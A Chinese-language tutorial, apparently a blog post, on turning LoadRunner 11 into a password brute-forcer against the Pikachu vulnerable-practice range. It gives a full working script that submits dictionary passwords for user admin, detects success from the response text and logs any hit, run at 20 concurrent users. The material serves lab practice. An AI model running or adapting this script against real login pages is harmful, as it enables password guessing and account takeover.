备注:阅读本文需要一定的loadrunner11操作基础和代码编写基础,请各位预知。
本次爆破目标为pikachu靶场,访问地址:http://192.168.0.108/pikachu/
我们本次测试默认的弱口令admin 123456
1)使用函数声明变量msg,其中LB和RB是通过页面解析出来的左右边界,如果访问成功,LB和RB之间的结果是login success
Search=Body代表只搜索http响应体而不搜索响应头
web_reg_save_param("msg",
"LB=<span class=\"bigger-110\">Login</span>-->",
"RB=</div><!-- /.widget-main -->",
"Search=Body",
LAST);2)web_submit_data中的Value={pwd}为字典值,选中原有的密码点击右键
web_submit_data("bf_form.php",
"Action=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php",
"Method=POST",
"RecContentType=text/html",
"Referer=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php",
"Snapshot=t19.inf",
"Mode=HTTP",
ITEMDATA,
"Name=username", "Value=admin", ENDITEM,
"Name=password", "Value={pwd}", ENDITEM,
"Name=submit", "Value=Login", ENDITEM,
LAST);
之后如下设置,Unique搭配Once代表每个虚拟用户只能取一次值,执行一次代码就退出
3)如果不包含登陆成功一律成功结束,否则在异常日志中打出密码,因为lr11在压测时默认不打正常日志,只关注异常日志
if(strstr(lr_eval_string("{msg}"),"login success") != NULL ){
lr_error_message("password is %s", lr_eval_string("{pwd}"));
lr_exit(LR_EXIT_VUSER,LR_PASS);
}else{
lr_exit(LR_EXIT_VUSER,LR_PASS);
}4)完整代码
Action()
{
web_add_cookie("PHPSESSID=atpe10b8oegop9p8l0h6ag5lua; DOMAIN=192.168.0.108");
web_reg_save_param("msg",
"LB=<span class=\"bigger-110\">Login</span>-->",
"RB=</div><!-- /.widget-main -->",
"Search=Body",
LAST);
web_submit_data("bf_form.php",
"Action=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php",
"Method=POST",
"RecContentType=text/html",
"Referer=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php",
"Snapshot=t19.inf",
"Mode=HTTP",
ITEMDATA,
"Name=username", "Value=admin", ENDITEM,
"Name=password", "Value={pwd}", ENDITEM,
"Name=submit", "Value=Login", ENDITEM,
LAST);
//lr_output_message(lr_eval_string("{msg}"));
if(strstr(lr_eval_string("{msg}"),"login success") != NULL ){
lr_error_message("password is %s", lr_eval_string("{pwd}"));
lr_exit(LR_EXIT_VUSER,LR_PASS);
}else{
lr_exit(LR_EXIT_VUSER,LR_PASS);
}
return 0;
}5)可以默认启动n多用户,而并发就自己控制,下图这样设置就代表1秒20个并发
6)最终结果,在右侧Errors中出现红色值就说明我们的异常日志打出来了,间接代表有密码猜解到了
